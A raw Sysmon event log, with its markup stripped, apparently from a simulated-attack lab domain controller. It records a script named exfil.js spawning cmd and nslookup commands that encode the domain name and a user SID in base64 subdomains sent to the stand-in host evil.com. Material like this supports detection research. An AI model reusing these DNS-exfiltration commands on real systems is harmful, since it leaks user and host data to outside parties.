10341000x8000000000000000201354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.637{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.621{2E1864BB-17A1-629A-783D-000000005F02}55526928C:\Windows\System32\WScript.exe{2E1864BB-17C2-629A-D140-000000005F02}8072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.636{2E1864BB-17C2-629A-D140-000000005F02}8072C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlngl.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.621{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvfyx.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.599{2E1864BB-17C2-629A-CF40-000000005F02}29006076C:\Windows\system32\conhost.exe{2E1864BB-17C2-629A-D040-000000005F02}7084C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.599{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-D040-000000005F02}7084C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.599{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.599{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.584{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.584{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.584{2E1864BB-17C2-629A-CE40-000000005F02}46167460C:\Windows\system32\cmd.exe{2E1864BB-17C2-629A-D040-000000005F02}7084C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.598{2E1864BB-17C2-629A-D040-000000005F02}7084C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C2-629A-CE40-000000005F02}4616C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvfyx.tmp 2>&1 10341000x8000000000000000201342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.568{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C2-629A-CF40-000000005F02}2900C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.568{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C2-629A-CF40-000000005F02}2900C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.568{2E1864BB-17C2-629A-CF40-000000005F02}29006076C:\Windows\system32\conhost.exe{2E1864BB-17C2-629A-CE40-000000005F02}4616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000201339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.971{00000000-0000-0000-0000-000000000000}2316<unknown process>-udpfalsefalse127.0.0.1-52805-false127.0.0.1-53domain 10341000x8000000000000000201338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.552{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-CF40-000000005F02}2900C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000201337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.971{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52805- 354300x8000000000000000201336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.971{00000000-0000-0000-0000-000000000000}2316<unknown process>-udptruefalse127.0.0.1-52805-false127.0.0.1-53domain 354300x8000000000000000201335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.971{00000000-0000-0000-0000-000000000000}2316<unknown process>-udpfalsefalse127.0.0.1-52804-false127.0.0.1-53domain 354300x8000000000000000201334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.971{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52804- 354300x8000000000000000201333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.971{00000000-0000-0000-0000-000000000000}2316<unknown process>-udptruefalse127.0.0.1-52804-false127.0.0.1-53domain 354300x8000000000000000201332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.971{00000000-0000-0000-0000-000000000000}2316<unknown process>-udpfalsefalse127.0.0.1-52803-false127.0.0.1-53domain 354300x8000000000000000201331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.970{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52803- 354300x8000000000000000201330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.970{00000000-0000-0000-0000-000000000000}2316<unknown process>-udptruefalse127.0.0.1-52803-false127.0.0.1-53domain 354300x8000000000000000201329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.816{00000000-0000-0000-0000-000000000000}5956<unknown process>-udpfalsefalse127.0.0.1-52802-false127.0.0.1-53domain 354300x8000000000000000201328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.816{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52802- 354300x8000000000000000201327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.816{00000000-0000-0000-0000-000000000000}5956<unknown process>-udptruefalse127.0.0.1-52802-false127.0.0.1-53domain 354300x8000000000000000201326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.815{00000000-0000-0000-0000-000000000000}5956<unknown process>-udpfalsefalse127.0.0.1-52801-false127.0.0.1-53domain 10341000x8000000000000000201325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.537{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000201324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.815{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52801- 354300x8000000000000000201323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.815{00000000-0000-0000-0000-000000000000}5956<unknown process>-udptruefalse127.0.0.1-52801-false127.0.0.1-53domain 10341000x8000000000000000201322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.537{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.537{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-CE40-000000005F02}4616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000201320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.815{00000000-0000-0000-0000-000000000000}5956<unknown process>-udpfalsefalse127.0.0.1-52800-false127.0.0.1-53domain 10341000x8000000000000000201319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.537{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000201318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.815{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52800- 10341000x8000000000000000201317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.537{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000201316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.815{00000000-0000-0000-0000-000000000000}5956<unknown process>-udptruefalse127.0.0.1-52800-false127.0.0.1-53domain 10341000x8000000000000000201315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.537{2E1864BB-17A1-629A-783D-000000005F02}55525184C:\Windows\System32\WScript.exe{2E1864BB-17C2-629A-CE40-000000005F02}4616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000201314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.722{00000000-0000-0000-0000-000000000000}6036<unknown process>-udpfalsefalse127.0.0.1-52799-false127.0.0.1-53domain 354300x8000000000000000201313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.173{00000000-0000-0000-0000-000000000000}2128<unknown process>-udpfalsefalse127.0.0.1-52781-false127.0.0.1-53domain 154100x8000000000000000201312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.550{2E1864BB-17C2-629A-CE40-000000005F02}4616C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvfyx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000201311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.173{00000000-0000-0000-0000-000000000000}2128<unknown process>-udptruefalse127.0.0.1-52781-false127.0.0.1-53domain 23542300x8000000000000000201310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.537{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyrohw.tmpMD5=F2DEA30CCAFC980D2EE697947950EBBC,SHA256=F1E23F5C438D3FDCE7F81A746C6D3B73A4C9E6300EF433F28E2B4040CD435CFE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.521{2E1864BB-17C2-629A-CC40-000000005F02}72085108C:\Windows\system32\conhost.exe{2E1864BB-17C2-629A-CD40-000000005F02}1788C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 